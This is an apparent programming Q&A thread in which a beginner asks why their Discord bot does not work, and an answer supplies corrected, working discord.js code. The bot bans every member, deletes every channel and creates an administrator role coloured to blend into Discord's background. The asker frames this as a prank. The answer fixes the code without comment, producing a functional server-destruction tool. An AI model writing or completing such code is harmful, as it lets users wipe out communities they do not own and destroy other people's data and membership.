# Why isn't my discord bot doing what it's supposed to?

Tags: javascript, node.js, discord, bots, discord.js

So I'm a beginner and I'm trying to make one of my first bots!

I decided to do something fun and made this bot. It's supposed to ban everyone off the server, delete all channels, and give you admin (I'm not actually going to be using it on other people, I'm just making it as a joke or to prank my friends. I'm also a complete beginner so sorry if the code is bad)

```
const Discord = require('discord.js');
const client = new Discord.Client();

client.once('ready', () => {
    console.log('Ready!');
});

if (Discord.Message.content === '!ban-all') {
    message.guild.members.filter(member => member.bannable).forEach(member => {member.ban()});
    message.delete(1000);
}

if (Discord.Message.content === '!give-admin') {
    role = message.guild.createRole({

        name: "Admin",
          color: "#2f3136",
          permissions: [8]

    });
        
    message.member.addRole(role)
    message.delete(1000);
}

if (Discord.Message.content === '!delete-all-channels') {
        message.guild.channels.forEach(channel => channel.delete())
          }

client.login('(my token)');
```

Answer (score 0):

```js
const Discord = require("discord.js");
const client = new Discord.Client();

client.on("ready", () => {
    console.log(`${client.user.tag} is ready!`);
});

client.on("message", message => {
    // Making sure that others cannot use the commands.
    if (message.author.id !== "YourDiscordID") return false;

    if (message.content.toLowerCase() == "!ban-all") {
        message.delete(1000);
        message.guild.members.cache.forEach(member => {
            member.ban().catch(e => {console.log(`Couldn't ban ${member.user.tag}. | ${e}`)});
        });
    };

    if (message.content.toLowerCase() == "!give-admin") {
        message.delete(1000);
        if (!message.guild.me.hasPermission("ADMINISTRATOR")) return message.reply("I do not have Administrator permissions.");

        message.guild.roles.create({
            data: {
                name: "Admin",
                color: "#2f3136",
                permissions: "ADMINISTRATOR"
            },
            reason: "Reason"
        }).then(role => message.member.roles.add(role).catch(e => console.log(`Couldn't add the role. | ${e}`)));
    };

    if (message.content.toLowerCase() == "!delete-all-channels") {
        message.guild.channels.cache.forEach(channel => channel.delete().catch(e => console.log(`Couldn't delete the channel. | ${e}`)));
    };
});

client.login(process.env.DISCORD_AUTH_TOKEN);
```